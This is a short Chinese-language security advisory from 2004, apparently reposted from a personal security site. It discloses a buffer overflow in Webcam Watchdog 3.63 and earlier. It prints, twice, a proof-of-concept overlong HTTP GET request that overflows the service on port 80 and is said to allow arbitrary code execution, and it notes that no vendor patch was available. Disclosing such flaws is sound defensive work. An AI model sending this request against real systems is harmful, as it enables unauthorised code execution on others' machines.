Webcam Watchdog 存在缓冲溢出缺陷
|
来源:vittersafe.yeah.net 作者:vitter 发布时间:2004-01-07
|
|
Webcam Watchdog 存在缓冲溢出缺陷 涉及程序: Webcam Watchdog 3.63版及其之前的版本 描述: Webcam Watchdog 存在缓冲溢出缺陷 详细: Webcam Watchdog是一套功能强大的远端数位监控系统。Webcam Watchdog程序存在缺陷,攻击者通过向目标程序的TCP 80端口发送精心构造的超长HTTP GET请求,能触发缓冲溢出缺陷: GET /('a'x234)('BBBB')('XXXX') HTTP/1.1User-Agent: WCSAXRViewHost: 127.0.0.1Cache-Control: no-cache 利用该缺陷,攻击者能在目标系统上执行任意代码。 攻击方法: 示例代码:GET /('a'x234)('BBBB')('XXXX') HTTP/1.1User-Agent: WCSAXRViewHost: 127.0.0.1Cache-Control: no-cache 解决方案: 目前厂商未公布该缺陷补丁,请用户及时关注厂商站点:http://www.webcamsoft.com 附加信息: 无
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|